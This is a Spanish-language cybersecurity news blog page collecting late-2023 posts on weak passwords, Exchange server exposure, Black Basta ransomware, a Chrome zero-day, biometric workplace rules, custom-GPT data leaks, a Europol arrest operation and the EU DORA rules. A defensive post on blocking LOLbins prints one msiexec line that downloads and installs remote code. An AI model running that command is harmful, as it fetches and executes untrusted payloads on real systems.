5 dic 2023

"123456" y "admin", las dos contraseñas más comunes en 2023😭

A lo largo de los años, hemos abordado la importancia de las contraseñas, subrayando su papel esencial en la protección de cuentas en línea. En el continuo baile de bits que conforma nuestro mundo digital, la seguridad de nuestras claves es una pieza fundamental para resguardar nuestra información personal.

Sin embargo, el informe más reciente de Nordpass sobre las contraseñas más utilizadas en 2023 indica que, a pesar de la creciente conciencia, los usuarios aún se aferran a contraseñas débiles y predecibles.

Por esto las contraseñas DEBEN desaparecer.

¿La contraseña "123456" suena familiar? Desafortunadamente, sigue encabezando la lista de las más utilizadas a nivel global y subraya la necesidad urgente de concientizar sobre prácticas de seguridad más robustas.

Si revisamos los resultados de ediciones anteriores [PDF], notamos una constante en la popularidad de contraseñas extremadamente débiles. Esta falta de variación en las elecciones de claves sugiere un desafío continuo en la promoción de prácticas de seguridad más sólidas.

En la edición de 2023, el informe de Nordpass analizó una base de datos masiva recopilada en colaboración con investigadores independientes de 35 países, especializados en incidentes de ciberseguridad. La situación en América Latina refleja un escenario donde la falta de conciencia sobre la seguridad cibernética se combina con el auge de ciberamenazas en la región.

NordPass analizó las contraseñas de una base de datos de 6.6 TB. Estas contraseñas fueron robadas por varios programas informáticos maliciosos y ladrones de contraseñas, como Redline, Vidar, Taurus, Raccoon, Azorult y Cryptbot. Los registros de malware no solo incluyen las contraseñas, sino también el sitio web de origen. Los investigadores clasificaron las contraseñas más populares por tipo de plataforma y compartieron los resultados estadísticos agregados con NordPass.

Aunque algunos países de la región presentan variaciones en sus elecciones, vemos que la preferencia por contraseñas numéricas sigue reinando como la opción más común. También se destaca el uso de nombres propios, siendo los más repetidos "benjamin", "antonio" y "santiago".

Fuente: WeLiveSecurity

4 dic 2023

Chile aprueba su nueva Política Nacional de Ciberseguridad (2023-2028)

Chile acaba de aprobar la nueva Política Nacional de Ciberseguridad, para el período 2023-2028. El Estado ha continuado con el proceso de implementación de la Política Nacional de Ciberseguridad anterior (2017-2022) y ha impulsado la discusión del proyecto de ley marco sobre ciberseguridad, poniendo especial énfasis en la protección y defensa de los derechos de las personas.

Para su elaboración se siguieron las recomendaciones de la Unión Internacional de Telecomunicaciones (UIT), se observó la experiencia de países similares y más avanzados, se consultaron diversas publicaciones internacionales y se realizó una evaluación del proceso de implementación de las medidas de la primera Política.

Algunas de las guías y manuales del Cooperative Cyber Defence Centre of Excellence de la OTAN; la National Cyber Security Strategies de ENISA; el Modelo de Madurez de Capacidades de Ciberseguridad para Naciones de la Universidad de Oxford; y el Índice Global de Ciberseguridad de la Unión Internacional de Telecomunicaciones.

El nuevo texto se articula en torno a 5 ejes, los que son definidos de la siguiente manera:

  • Infraestructura resiliente: el Estado debe contar con una infraestructura de la información robusta y resiliente, preparada para resistir y recuperarse de incidentes de ciberseguridad y de desastres socioambientales, bajo una perspectiva de gestión de riesgos.
  • Derechos de las personas: el Estado promoverá la protección en Internet, fortaleciendo la institucionalidad en ciberseguridad para la integración de cada persona en la sociedad.
  • Cultura de ciberseguridad: el Estado debe desarrollar una cultura en torno a la educación, buenas prácticas y responsabilidad.
  • Coordinación nacional e internacional: el Estado creará una gobernanza pública para coordinar las acciones necesarias en ciberseguridad. Los organismos públicos y privados crearán, en conjunto, instancias de cooperación con el propósito de comunicar y difundir sus actividades en ciberseguridad, evitar la duplicación de trabajo y pérdida de recursos, y hacer eficientes los esfuerzos en esta área. En el ámbito internacional, el Estado se coordinará con países, organismos, instituciones y otros actores internacionales para permitir a nuestro país enfrentar de mejor manera las actividades maliciosas e incidentes en el ciberespacio
  • Fomento a la industria y la investigación científica: promover el desarrollo de una industria de la ciberseguridad y fomentaremos la investigación científica aplicada a la ciberseguridad.

El texto completo se puede descargar desde aquí: https://www.diariooficial.interior.gob.cl/edicionelectronica/index.php?date=04-12-2023&edition=43717 (CVE-2415658) - Acceso al PDF.

Más de 20.000 servidores Microsoft Exchange vulnerables y expuestos a ataques

Decenas de miles de servidores de correo electrónico de Microsoft Exchange en Europa, EE.UU., América Latina y Asia expuestos en la Internet pública son vulnerables a fallas de ejecución remota de código.

Los sistemas de correo ejecutan una versión de software que actualmente no tiene soporte y ya no recibe ningún tipo de actualizaciones, siendo vulnerables a múltiples problemas de seguridad, algunos con clasificación de gravedad crítica.

Los análisis de Internet de The ShadowServer Foundation muestran que actualmente hay cerca de 20.000 servidores Microsoft Exchange accesibles a través de la Internet pública que han alcanzado la etapa de fin de vida útil (EoL).

El viernes, más de la mitad de los sistemas estaban ubicados en Europa. En América del Norte, había 6.038 servidores Exchange y en Asia 2.241 instancias.

Sin embargo, es posible que las estadísticas de ShadowServer no muestren el panorama completo, ya que el investigador de seguridad de Macnica, Yutaka Sejiyama, descubrió que poco más de 30.000 servidores Microsoft Exchange alcanzaron el fin del soporte.

Según los escaneos de Sejiyama en Shodan, a finales de noviembre había 30.635 máquinas en la web pública con una versión no compatible de Microsoft Exchange:

  • 275 instancias de Exchange Server 2007
  • 4.062 instancias de Exchange Server 2010
  • 26.298 instancias de Exchange Server 2013

Riesgo de ejecución remota de código

El investigador también comparó la tasa de actualización y observó que desde abril de este año, el número global de servidores en EoL de Exchange cayó sólo un 18% desde 43.656, una disminución que Sejiyama considera insuficiente.

"Incluso recientemente, sigo viendo noticias sobre la explotación de estas vulnerabilidades y ahora entiendo por qué. Muchos servidores todavía se encuentran en un estado vulnerable" - Yutaka Sejiyama.

La Fundación ShadowServer destaca que las máquinas Exchange obsoletas descubiertas en la web pública eran vulnerables a múltiples fallas de ejecución remota de código.

Algunas de las máquinas que ejecutan versiones anteriores del servidor de correo Exchange son vulnerables a ProxyLogon, un problema de seguridad crítico identificado como CVE-2021-26855, que puede encadenarse con un error menos grave identificado como CVE-2021-27065 para lograr la ejecución remota de código. .

Según Sejiyama, según los números de compilación obtenidos de los sistemas durante el análisis, hay cerca de 1.800 sistemas Exchange que son vulnerables a las vulnerabilidades ProxyLogon, ProxyShell o ProxyToken.

ShadowServer señala que las máquinas analizadas son vulnerables a los siguientes fallos de seguridad:

Aunque la mayoría de las vulnerabilidades mencionadas anteriormente no tienen una puntuación de gravedad crítica, Microsoft las marcó como "importantes". Además, a excepción de la cadena ProxyLogon, que ha sido explotada en ataques, todas fueron etiquetadas como "más propensas" a ser explotadas.

Incluso si las empresas que aún ejecutan servidores Exchange obsoletos han implementado las mitigaciones disponibles, la medida no es suficiente, ya que Microsoft recomienda priorizar la instalación de actualizaciones en los servidores externos.

En el caso de las instancias que llegaron al final del soporte, la única opción que queda es actualizar a una versión que aún reciba al menos actualizaciones de seguridad.

Fuente: BC

2 dic 2023

Bloquear LOLbins con el firewall de Windows

Hoy en día, muchos tipos de malware y troyanos de acceso remoto (RAT) y APTs utilizan archivos binarios integrados de Windows para preparar e infectar computadoras. Los programas comúnmente utilizados en este tipo de ataques son powershell.exe, regsvr32, rundll32, certreq.exe, certutil.exe y mshta.exe.

Los binarios de Living of the Land (LOLbins) evitan protecciones como AppLocker, ya que residen en la carpeta de Windows y/o están diseñados en código por Microsoft. Un ejemplo es:

msiexec /q /i http://192.168.100.3/tmp/cmd.png

En el proyecto LOLBAS se puede encontrar una excelente descripción general de cómo se puede "abusar" de los archivos binarios integrados para descargar o ejecutar código.

Para obtener más información sobre como estas herramientas son utilizadas por delincuentes y APTs, se puede consultar este artículo de Cynet.

Estos script de PowerShell crean nuevas reglas de firewall que bloquean el acceso a la red de LOLbin, archivos binarios legales del sistema operativo y comúnmente utilizados para llevar adelantes ataques.

En resumen, los scripts evitan que las utilidades integradas de Windows accedan a Internet. Por ejemplo, en la mayoría de las circunstancias, usar expand.exe para acceder a un archivo remoto es extremadamente improbable y definitivamente estaría mal visto si fuera necesario por razones legítimas.

Estas listas de bloqueo deben usarse con cuidado porque el sistema operativo podría verse afectado:

Sería mejor implementar herramientas como Attack Surface Reduction rulesAdvanced Windows Defender featuresArbitary Code GuardExploit Protection, las cuales deberían utilizarse para brindar una mejor protección. Sin embargo, estas reglas se pueden utilizar en lugar de esas tecnologías para ofrecer cierta protección básica.

Créditos:

1 dic 2023

Ransomware Black Basta recibió al menos 107 millones de dólares en pagos

Black Basta es un ransomware vinculado a Rusia que surgió a principios de 2022. Se ha utilizado para atacar a más de 329 organizaciones en todo el mundo y ha crecido hasta convertirse en la cuarta cepa de ransomware más activa por número de víctimas en 2022-2023. El grupo emplea tácticas de doble extorsión mediante las cuales extorsionan a la víctima amenazándola con publicar datos robados a menos que la víctima pague un rescate.

El análisis de las empresas Elliptic and Corvus Insurance sobre las transacciones de criptomonedas verificadas de Black Basta, ha descubierto patrones únicos en la actividad del grupo. Esto ha permitido identificar con gran confianza una gran cantidad de rescates en Bitcoin pagados al grupo.

Los investigadores han sugerido que BlackBasta puede ser una rama de Conti Group, una de las bandas de ransomware más prolíficas de los últimos años. Las filtraciones de los chats en línea de Conti insinuaron sus vínculos con el gobierno ruso y su apoyo a la invasión de Ucrania, antes de que el grupo se disolviera en mayo de 2022.

Black Basta se dirige a empresas de una amplia variedad de sectores, incluidos la construcción (10% de las víctimas), el despacho de abogados (4%) y el sector inmobiliario (3%). De hecho, la victimología de Black Basta se parece mucho a la del grupo de ransomware Conti, ambos con un apetito superpuesto por muchas de las mismas industrias.

Black Basta se ha centrado en gran medida en organizaciones con sede en Estados Unidos, que representan el 61% de todas las víctimas, seguidas por Alemania con el 15%.

Entre las víctimas de alto perfil de Black Basta se encuentran Capita, un subcontratista de tecnología con miles de millones de dólares en contratos gubernamentales del Reino Unido, y la empresa de automatización industrial ABB, que tiene ingresos de más de 29 mil millones de dólares. Ninguna de las empresas ha revelado públicamente si pagaron un rescate.

Identificación de pagos de rescate de Black Basta

A pesar de la transparencia de las cadenas de bloques, puede resultar complicado identificar los pagos de rescate realizados en criptomonedas. En primer lugar, los grupos de ransomware rara vez utilizan una única billetera para recibir pagos y las víctimas rara vez comparten detalles de la billetera a la que pagaron el rescate. Esto puede dificultar el seguimiento de la actividad de un grupo de ransomware a escala. En segundo lugar, estos grupos también emplean complejas técnicas de lavado para cubrir sus pistas de blockchain y ocultar la fuente ilícita de sus ganancias.

El análisis sugiere que Black Basta ha recibido al menos 107 millones de dólares en pagos de rescate desde principios de 2022, entre más de 90 víctimas. El mayor pago de rescate recibido fue de 9 millones de dólares, y al menos 18 de los rescates superaron el millón de dólares. El pago promedio del rescate fue de 1,2 millones de dólares.

Cabe señalar que estas cifras son un límite inferior; es probable que se realicen otros pagos de rescate a Black Basta que el análisis aún debe identificar, particularmente en relación con las víctimas recientes. Debido a la superposición entre los grupos, algunos de estos pagos también pueden estar relacionados con ataques de ransomware Conti.

Según la cantidad de víctimas conocidas que figuran en el sitio de filtración de Black Basta hasta el tercer trimestre de 2023, los datos indican que al menos el 35% de las víctimas conocidas de Black Basta pagaron un rescate. Esto concuerda con los informes de que el 41% de todas las víctimas de ransomware pagaron un rescate en 2022.

​Descubriendo los vínculos financieros de Black Basta

El malware Qakbot, que infecta los ordenadores de las víctimas mediante ataques de phishing por correo electrónico, se utilizaba habitualmente para implementar el ransomware Black Basta. Este vínculo entre los grupos también es visible en la cadena de bloques, con partes de los rescates de algunas víctimas enviadas a las billeteras de Qakbot. Estas transacciones indican que aproximadamente el 10% del monto del rescate se envió a Qakbot, en los casos en que participaron en brindar acceso a la víctima. Qakbot fue interrumpido en agosto de 2023 por una operación policial multinacional, lo que quizás explique una marcada reducción de los ataques de Black Basta en la segunda mitad de 2023.

El operador Black Basta parece cobrar una media del 14% de los pagos de rescate. Esto es típico del ransomware como servicio.

El análisis de las transacciones criptográficas de Black Basta también proporciona nueva evidencia de sus vínculos con Conti Group. En particular, los investigadores ha rastreado bitcoins por valor de varios millones de dólares desde carteras vinculadas a Conti hasta aquellas asociadas con el operador Black Basta. Esto refuerza aún más la teoría de que Black Basta es una rama o un cambio de marca de Conti.

Elliptic Investigator también proporciona información sobre cómo se blanquean los pagos de rescate, y millones de dólares de las ganancias del grupo se envían a Garantex, un intercambio de criptomonedas ruso. Garantex fue sancionado por el gobierno de EE.UU. en abril de 2022 por su papel en el blanqueo de ingresos de mercados de la red oscura y bandas de ransomware como Conti.

Conclusión

Esta investigación conjunta realizada por Elliptic y Corvus Insurance ha arrojado luz sobre el alcance del daño causado por el ransomware Black Basta. El análisis de las transacciones blockchain ha revelado un vínculo claro entre Black Basta y Conti Group, lo que respalda la posibilidad de que el primero sea una rama del segundo. Black Basta ha demostrado resistencia a pesar del derribo de Qakbot, por lo que los defensores no deberían descartar a Black Basta como una amenaza insignificante.

Protección de correo electrónico y detección y respuesta de endpoints (EDR)

Implemente una sólida protección de correo electrónico y EDR. Estos son cruciales dada la dependencia del grupo de ladrones de información para obtener acceso inicial.

Autenticación multifactor (MFA)

Utilice MFA siempre que sea posible, especialmente para acceso remoto y cuentas administrativas, para agregar una capa adicional de seguridad contra el robo de credenciales.

Gestión de parches

Mantenga todos los sistemas, software y aplicaciones actualizados con los últimos parches de seguridad para reducir las vulnerabilidades.

Fuente: Corvus Insurance

30 nov 2023

(Nuevo) Zero-Day en Google Chrome

En una actualización de seguridad de emergencia lanzada ayer, Google ha solucionado la sexta vulnerabilidad Zero-Day en Chrome este año. La compañía reconoció la existencia de un exploit para la falla de seguridad (rastreada como CVE-2023-6345).

La vulnerabilidad se ha abordado en el canal Stable Desktop, con versiones parcheadas implementadas globalmente para usuarios de Windows (119.0.6045.199/.200) y usuarios de Mac y Linux (119.0.6045.199). Esta actualización además, incluye 7 correcciones de seguridad. 

Los usuarios que no quieran actualizar manualmente pueden confiar en el navegador web para buscar nuevas actualizaciones automáticamente e instalarlas después del próximo lanzamiento.

Probablemente esté siendo explotado en ataques de software espía

Esta vulnerabilidad de día cero de alta gravedad se debe a una debilidad de desbordamiento de enteros dentro de la biblioteca de gráficos 2D de código abierto de Skia, lo que plantea riesgos que van desde fallas hasta la ejecución de código arbitrario (Skia también se utiliza como motor de gráficos en otros productos como ChromeOS, Android y Flutter).

El error fue informado el viernes 24 de noviembre por Benoît Sevens y Clément Lecigne, dos investigadores de seguridad del Grupo de Análisis de Amenazas (TAG) de Google.

Google TAG es conocido por descubrir Zero-Days, a menudo explotados por grupos de delincuentes informáticos patrocinados por el estado en campañas de software espía dirigidas a personas de alto perfil como periodistas y políticos de la oposición.

La compañía ha declarado que el acceso a los detalles permanecerá restringido hasta que la mayoría de los usuarios hayan actualizado sus navegadores. Si la falla también afecta al software de terceros que aún no ha sido parcheado, entonces se ampliará la limitación de acceso a los detalles y enlaces del error.

Esto tiene como objetivo reducir la probabilidad de que los actores de amenazas desarrollen sus propios exploits CVE-2023-6345, aprovechando la información técnica recientemente publicada sobre la vulnerabilidad.

En septiembre, Google solucionó otros dos Zero-Days (rastreados como CVE-2023-5217 y CVE-2023-4863), el cuarto y quinto desde principios de 2023.

Anteriormente, la empresa lanzó actualizaciones de seguridad para CVE-2023-3079, CVE-2023-2136 y CVE-2023-2033. Google TAG también etiquetó un error de ejecución remota de código (CVE-2023-4762) como día cero después de descubrir su uso en ataques de software espía, semanas después de que se parcheara a principios de septiembre.

Se puede consultar la página de seguridad de Chrome para obtener más información.

Fuente: BC

29 nov 2023

En España, fichar con la huella dactilar en el trabajo ERA legal... ¡YA NO!👏

En 2007 el Tribunal Supremo sentenció que usar la huella dactilar para fichar en el trabajo era legítimo. Una directiva europea cambia el criterio y ya no lo es.

Los sistemas de control biométrico de entrada han estado en el foco de la polémica desde que se obligó a las empresas a registrar la jornada de los empleados. Su normativa ha estado sujeta a guías, normativas e incluso leyes, que no han dejado de cambiar y complicarse desde sus inicios, creando inseguridad jurídica que puede desembocar en severas multas.

Por resumir la última polémica en cuatro palabras: si una empresa utiliza un sistema de reconocimiento de huella dactilar para fichar en la entrada o salida, estaría incumpliendo la normativa de la Agencia Española de Protección de Datos (AEPD), y la empresa podría ser sancionada porque utilizar la huella dactilar es ilegal incluso cuando el empleado ha dado su consentimiento de uso. Pero, tal y como destacan desde Audens, no siempre lo ha sido.

En julio de 2007 el Tribunal Supremo dictaba sentencia considerando que utilizar la huella dactilar para el control horario no era una medida excesiva, y el uso a esta tecnología no estaba limitado por norma alguna. En noviembre de 2012 se aplicaban cambios en el artículo 20.3 del Real Decreto Legislativo 2/2015 indican que "El empresario podrá adoptar las medidas que estime más oportunas de vigilancia y control para verificar el cumplimiento por el trabajador de sus obligaciones y deberes laborales". Es decir, que el empresario podía continuar usando el registro de jornada por huella dactilar de forma legal.

En 2016 se publica el Reglamento General de Protección de Datos (RGPD), y en él se incluyen los sistemas de identificación por huella dactilar y datos biométricos como "categoría especial", diferenciando los usos de "identificación" y "autenticación". El RGPD dice: "Sin embargo, y con carácter general, los datos biométricos únicamente tendrán la consideración de categoría especial de datos en los supuestos en que se sometan a tratamiento técnico dirigido a la identificación biométrica (uno-a-varios) y no en el caso de verificación/autenticación biométrica (uno-a-uno)".

Esto implica que el sistema de registro de jornada por huella dactilar vendría a verificar la identidad de un empleado previamente registrado está presente, con lo cual no incurre en los supuestos de identificación sino en los de autenticación, quedando fuera de "categoría especial". Por lo tanto, en este supuesto, el registro por huella dactilar todavía se ajusta a la doctrina del Tribunal Supremo y mantiene su legalidad.

En abril de 2023, el Comité Europeo de Protección de Datos confirmó unas directrices que tiraban por tierra las instrucciones del Tribunal Supremo y de la Agencia Española de Protección de Datos. En estas directrices se unifica el criterio de Autenticación y e Identificación que la AGPD había mantenido separado metiendo a ambos en "categoría especial" para el tratamiento de datos.

El artículo 12 de esta directriz del Comité Europeo de Protección de Datos dice: "Si bien ambas funciones (autenticación e identificación) son distintas, ambas se relacionan con el procesamiento de datos biométricos relacionados con una persona física identificada o identificable y, por lo tanto, constituyen un tratamiento de datos personales, y más concretamente un tratamiento de categorías especiales de información personal".

Dado ese cambio de criterio entre Autenticación e Identificación, la AGPD se ha visto forzada a cambiar sus directivas y ha publicado una Guía sobre tratamientos de control de presencia mediante sistemas biométricos.

En esta guía ya se especifica el carácter de "categoría especial" para este tipo de uso de los datos biométricos, y en sus artículos IV y V se desvincula a esa forma de control de acceso su carácter "necesario" que obliga el RGPD y deja patente que es imposible superar el requisito de necesidad establecido para realizar estos tratamientos, aun contando con el consentimiento de los trabajadores.

Al no poder cumplir estos criterios, el reconocimiento de huella dactilar o facial queda declarado prohibido con carácter general, salvo en los escasos supuestos recogidos en el artículo 9 del RGPD (interés público, sanitario, de seguridad pública, etc.).

Con la nueva interpretación de la AEPD, debe sustituirse un sistema de registro de huella dactilar o por reconocimiento facial por una persona que controle y verifique el acceso o cualquier otro sistema de que no implique el uso de sus datos biométricos. Su aplicación es inmediata, por lo que cualquier empresa que utilice este sistema de reconocimiento biométrico en 2023 puede ser sancionada por la AEPD, sin importar que cuando se instalara dicho sistema fuera legal.

Fuente: Xataka

ChatGPT personalizados podrían exponer datos

ChatGPT se ha convertido en una herramienta muy útil en los últimos meses, tanto para lo bueno como para lo malo. Es un chat de inteligencia artificial que puede venir bien para resolver ciertas dudas, pero lo cierto es que también es muy usado por los piratas informáticos. Podemos encontrarnos con programas falsos que simulan ser el original o páginas fraudulentas que buscan robar tus datos. Vamos a explicar cómo pueden filtrar tus datos.

Pero, ¿qué es exactamente un ChatGPT personalizado? Básicamente, una herramienta de IA personalizada que puedes crear para cualquier tema que te interese. Puede ser relacionado con juegos, película, creación de algún tipo de contenido, etc. Pero esto, como vas a ver, puede ser un problema.
GPT personalizados, un riesgo

El problema es que, al compartir los GPT personalizados, podrías estar exponiendo tus datos a cualquiera. Al personalizar esta mini versión programablede ChatGPT, estás dando información e instrucciones específicas. Por ejemplo, si vas a crear una versión para responder preguntas relacionadas con la actividad física, vas a dar datos para que pueda responder como un entrenador personal.

Vas a tener que subir archivos, instrucciones e información para que responda de la manera que tú quieres. ¿Qué ocurre? Alguien podría llegar a acceder a eso que estás subiendo a la plataforma. Un investigador de seguridad ha encontrado la manera de que ese chat personalizado devuelva un enlace con el archivo que se ha subido previamente con las instrucciones. Aunque indican que no se comparta eso con nadie, existe la opción de que el chat devuelva ese enlace.

A través de ese archivo, alguien podría acceder al contenido completo y descargarlo. Esto, lógicamente, no en todos los casos va a tener la misma repercusión. Puede que sea información irrelevante, que no va a afectar en nada a la persona que ha creado ese chat, pero podría ser que sí que contenga datos personales o cualquier información que afecte a terceros.

Si vas a crear un ChatGPT personalizado, es importante que tengas en cuenta algunos consejos para no tener problemas. Algo básico es decidir si realmente necesitas compartirlo de forma pública o solo con tus amigos o familiares. Eso limitará mucho la probabilidad de que termine en malas manos y pueda afectarte.

A partir de ahí, puedes hacer que ese chat personalizado solo esté disponible para ti, para otras personas con enlace o para que cualquiera pueda entrar. Esto último, lógicamente, es lo que más problemas podría ocasionar. Si restringes el acceso, tendrás un mayor control y evitarás que puedan acceder a tus datos.

Más allá de esto, siempre que vayas a crear un chat personalizado de este tipo, es importante que limites la información que vayas a dar. Al crear las instrucciones para que funcione, limítate a lo esencial. No des más datos de los realmente necesarios, ya que eso podría llegar a poner en riesgo tu privacidad y que esa información termine en malas manos.

Fuente: RedesZone

28 nov 2023

Colaboración internacional permite desmantelamiento de grupos de ransomware (video)

En un esfuerzo sin precedentes, las autoridades judiciales y policiales de siete países han unido fuerzas con Europol y Eurojust para desmantelar y detener en Ucrania a figuras clave detrás de importantes operaciones de ransomware que causan estragos en todo el mundo. La operación llega en un momento crítico, mientras el país se enfrenta a los desafíos de la agresión militar de Rusia contra su territorio. VIDEO

La investigación se benefició de la financiación de la Plataforma Multidisciplinar Europea Contra las Amenazas Criminales (EMPACT).

El 21 de noviembre, se registraron 30 propiedades en las regiones de Kiev, Cherkasy, Rivne y Vinnytsia, lo que resultó en el arresto del cabecilla de 32 años. También fueron detenidos cuatro de los cómplices más activos del cabecilla.

Más de 20 investigadores de Noruega, Francia, Alemania y Estados Unidos fueron enviados a Kiev para ayudar a la Policía Nacional de Ucrania en sus medidas de investigación. Esta configuración se reflejó en la sede de Europol en los Países Bajos, donde se activó un puesto de mando virtual para analizar inmediatamente los datos incautados durante los registros domiciliarios en Ucrania.

Esta última acción se produce tras una primera ronda de detenciones en 2021 en el marco de la misma investigación. Desde entonces, se han organizado una serie de sprints operativos en Europol y en Noruega con el objetivo de analizar forensemente los dispositivos incautados en Ucrania en 2021. Este trabajo de seguimiento forense facilitó la identificación de los sospechosos atacados durante la acción de la semana pasada en Kiev.

Se cree que las personas investigadas forman parte de una red responsable de una serie de ataques de ransomware de alto perfil contra organizaciones en 71 países. Implementaron los ransomware LockerGoga, MegaCortex, HIVE y Dharma, entre otros, para llevar a cabo sus ataques.

Los sospechosos tenían diferentes roles en esta organización criminal. Se cree que algunos de ellos están involucrados en comprometer las redes informáticas de sus objetivos, mientras que se sospecha que otros están a cargo del blanqueo de pagos en criptomonedas realizados por las víctimas para descifrar sus archivos.

Los responsables de irrumpir en las redes lo hacían mediante técnicas que incluían ataques de fuerza bruta, inyecciones SQL y envío de correos electrónicos de phishing con archivos adjuntos maliciosos para robar nombres de usuario y contraseñas.

Una vez dentro de las redes, los atacantes no fueron detectados y obtuvieron acceso adicional utilizando herramientas como el malware TrickBot, Cobalt Strike y PowerShell Empire, para comprometer tantos sistemas como fuera posible antes de desencadenar ataques de ransomware.

La investigación determinó que los autores cifraron más de 250 servidores de grandes empresas, lo que provocó pérdidas de varios cientos de millones de euros.

Cooperación internacional

Por iniciativa de las autoridades francesas, en septiembre de 2019 se creó un equipo conjunto de investigación (JIT) entre Noruega, Francia, el Reino Unido y Ucrania, con el apoyo financiero de Eurojust y la asistencia de ambas agencias. Desde entonces, los socios del JIT colaboran estrechamente, en paralelo con las investigaciones independientes de las autoridades holandesas, alemanas, suizas y estadounidenses, para localizar a los autores de amenazas en Ucrania y llevarlos ante la justicia.

Esta cooperación internacional se ha mantenido firme e ininterrumpida, persistiendo incluso en medio de los desafíos que plantea la guerra en curso en Ucrania.

Inicialmente, un oficial de ciberpolicía ucraniano fue enviado a Europol durante dos meses para preparar la primera fase de la acción, antes de ser enviado a Europol de forma permanente para facilitar la cooperación policial en este campo.

Desde el inicio de la investigación, el Centro Europeo de Ciberdelincuencia (EC3) de Europol organizó reuniones operativas, proporcionando soporte forense digital, criptomonedas y malware, y facilitando el intercambio de información en el marco del Grupo de Trabajo Conjunto de Acción contra la Ciberdelincuencia (J-CAT) alojado en la sede de Europol.

Eurojust acogió doce reuniones de coordinación para facilitar la comunicación y la cooperación judicial entre las autoridades implicadas.

El análisis forense realizado en el marco de esta investigación también permitió a las autoridades suizas desarrollar, junto con los socios de No More Ransom, herramientas de descifrado para las variantes de ransomware LockerGoga y MegaCortex.

Fuente: Europol | CyberPolice

Gestión de Riesgos bajo el Reglamento DORA

El sector financiero está bastante regulado e involucra una gran cantidad de datos confidenciales. Por lo tanto, se esperaría que al sector le vaya mejor en materia de seguridad de datos que a una organización promedio.

¿Qué es DORA?

La Ley de Resiliencia Operativa Digital, o DORA, es un reglamento de la Unión Europea (UE) que crea un marco vinculante y exhaustivo para la gestión de los riesgos de las tecnologías de la información y la comunicación (TIC) en el sector financiero de la UE. El reglamento DORA establece las normas técnicas que las entidades financieras y sus terceros proveedores de servicios tecnológicos críticos deben implantar en sus sistemas TIC antes del 17 de enero de 2025.

Antes de DORA (Digital Operational Resilience Act), la normativa sobre gestión de riesgos de las entidades financieras de la UE se centraba principalmente en garantizar que las empresas dispusieran de capital suficiente para cubrir los riesgos operativos. Aunque algunos reguladores de la UE publicaron directrices sobre TIC y gestión de riesgos de seguridad, estas directrices no se aplicaban a todas las entidades financieras por igual, y a menudo se basaban en principios generales más que en normas técnicas específicas. A falta de normas comunitarias sobre gestión de riesgos de las TIC, los Estados miembros de la UE han establecido sus propios requisitos.

DORA se aplica a todas las instituciones financieras de la UE. Esto incluye entidades financieras tradicionales, como bancos, empresas de inversión y entidades de crédito, y entidades no tradicionales, como proveedores de servicios de criptoactivos y plataformas de crowdfunding.

¿Qué dicen las estadísticas?

Los datos públicos establecidos en el sitio web de la ICO (Oficina del Comisionado de Información) muestran que la seguridad de los datos no es necesariamente mejor para las organizaciones financieras.

Aunque el número total de filtraciones de datos –o mejor dicho, de las denunciadas– disminuyó un 24% entre 2019 y 2022 en el sector financiero, el número de incidentes aumentó un 99%. De hecho, en 2020-2022, el sector financiero fue el segundo más atacado, superado únicamente por el sector minorista y manufacturero.

Esto es particularmente preocupante si se combina con los hallazgos del Informe sobre el costo de una filtración de datos de 2023 de IBM, que sitúa el costo promedio de una filtración en 2023 en 5,90 millones de dólares (aproximadamente 4,70 millones de libras esterlinas) para el sector financiero, un 33% más que el promedio en todo el mundo. todos los sectores.

Es cierto que estas cifras reflejan principalmente las tendencias del Reino Unido, pero no hay duda de que los grandes bancos de la UE también están en el punto de mira, incluidos el Banco Europeo de Inversiones, el Deutsche Bank y el ING Bank. Esto realmente no debería sorprendernos: estos son objetivos lucrativos para los ciberdelincuentes.

Requisitos de gestión de riesgos de TIC según DORA

Quizás aún más preocupante para los legisladores de la UE es cuán dependiente es la sociedad en general de la banca y otros servicios financieros. Si estos se interrumpen, las actividades comerciales cotidianas no se podrán completar, no sólo dentro del estado miembro en el que se encuentra el banco, sino también a través de las fronteras.

A su vez, las instituciones financieras dependen en gran medida de las TIC para poder proporcionar esos servicios, para empezar. Esto a menudo se subcontrata a proveedores de servicios externos, por lo que es importante que la cadena de suministro también sea resiliente, no solo las propias instituciones financieras.

Estas consideraciones estaban en la mente de los legisladores de la UE cuando introdujeron la DORA. Aunque es una ley de la UE, también afectará a las organizaciones del Reino Unido si operan en la UE. Estos impulsan los otros requisitos de nivel inferior en DORA.

Hay tres requisitos fundamentales para este reglamento:
  • Gestión de riesgos
  • Administración de incidentes
  • Seguridad de la cadena de suministro

En el Capítulo II, DORA reconoce la gobernanza como una parte clave del marco de gestión de riesgos de TIC de la organización. El Reglamento responsabiliza al órgano de dirección de la organización de implementar ese marco y de la gestión general del riesgo de TIC.

El propio marco de gestión de riesgos de TIC debe ser estratégico, documentado y revisado al menos una vez al año.

Como parte de ese marco, las organizaciones también deben, entre otras cosas:

  • Identificar todos los activos relevantes;
  • Proteger la confidencialidad, integridad, disponibilidad y autenticidad de su información;
  • Ser capaz de detectar posibles problemas de rendimiento de la red e incidentes relacionados con las TIC;
  • Implementar una política "integral" de continuidad del negocio de TIC;
  • Tener medidas para restaurar rápidamente los sistemas y recuperar datos en caso de una interrupción; y
  • Divulgar incidentes o vulnerabilidades "importantes" relacionados con las TIC.

Se debe tener en cuenta que existen varias exenciones o requisitos más simples dependiendo de factores como el tamaño de la organización.

Estrategia de resiliencia operativa digital

En el centro del pilar de gestión de riesgos (y de DORA en su conjunto) se encuentra la estrategia de resiliencia operativa digital.

DORA se introdujo para garantizar que la infraestructura financiera de la UE, considerando su gran dependencia de las TIC, pueda hacer frente a las perturbaciones que parecen inevitables cuando se utiliza cualquier TIC.

Idealmente, eso significa evitar las interrupciones por completo. Sin embargo, dado que eso no es realista en el clima actual, las instituciones financieras y sus cadenas de suministro deberían buscar la resiliencia.

Lograr resiliencia operativa significa poder recuperarse rápidamente de interrupciones, accidentales o no, y continuar brindando un nivel aceptable de servicio durante el período de recuperación.

¿Qué deberían hacer las organizaciones ahora?

DORA no se aplicará hasta el 17 de enero de 2025, por lo que las organizaciones tienen tiempo antes de tener que cumplir plenamente.

Sin embargo, independientemente de esta nueva ley, es importante que las organizaciones pongan su casa en orden en lo que respecta a la gestión de riesgos y activos de TIC.

La mayoría de las organizaciones literalmente no podrían hacer negocios si sus TIC no funcionaran correctamente, y las estadísticas anteriores muestran que esto está en riesgo real.

Teniendo esto en cuenta, las organizaciones deberían tratar los productos y servicios relacionados con las TIC como cualquier otro activo empresarial. Realice un seguimiento de ellos en un inventario de activos y luego consulte ese inventario cuando identifique, evalúe y responda a sus riesgos.

